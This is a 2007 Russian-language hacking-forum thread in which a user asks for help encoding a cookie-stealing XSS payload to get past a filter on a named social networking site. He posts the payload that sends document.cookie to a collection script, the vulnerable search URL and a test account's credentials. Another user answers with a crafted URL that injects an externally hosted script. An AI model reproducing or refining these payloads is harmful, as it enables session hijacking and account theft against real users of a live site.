Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   xss шифровка (https://forum.antichat.xyz/showthread.php?t=55386)

offiks 09.12.2007 14:56

xss шифровка
 
помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!--
и обойти фильтр :(
Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу

bul.666 09.12.2007 15:04

Цитата:

и обойти фильтр
А фильтр на что ругаеться?

Sn@k3 09.12.2007 15:07

в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести

Dumkopff 09.12.2007 15:09

http://old.antichat.ru/crackchat/HTML/
кури.

offiks 09.12.2007 15:11

я честно не могу разобратся в чём дело но ко мне доходит только: &quot; escape(document.cookie) &quot;

по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

P.S. большое спасибо за отзывчевость

Sn@k3 09.12.2007 15:22

Цитата:

Сообщение от Dumkopff
http://old.antichat.ru/crackchat/HTML/
кури.

если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех

offiks 09.12.2007 15:33

я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут)

помогите подходяще закодировать :( пробовал кодировать весь урл, всё равно не работает...

Пожалуйста :( для меня это вопрос сложный, уже 2 день парюсь

bul.666 09.12.2007 15:42

пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\

offiks 09.12.2007 15:45

ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat

кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: &quot; &quot;

bul.666 09.12.2007 15:58

http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E


Время: 05:16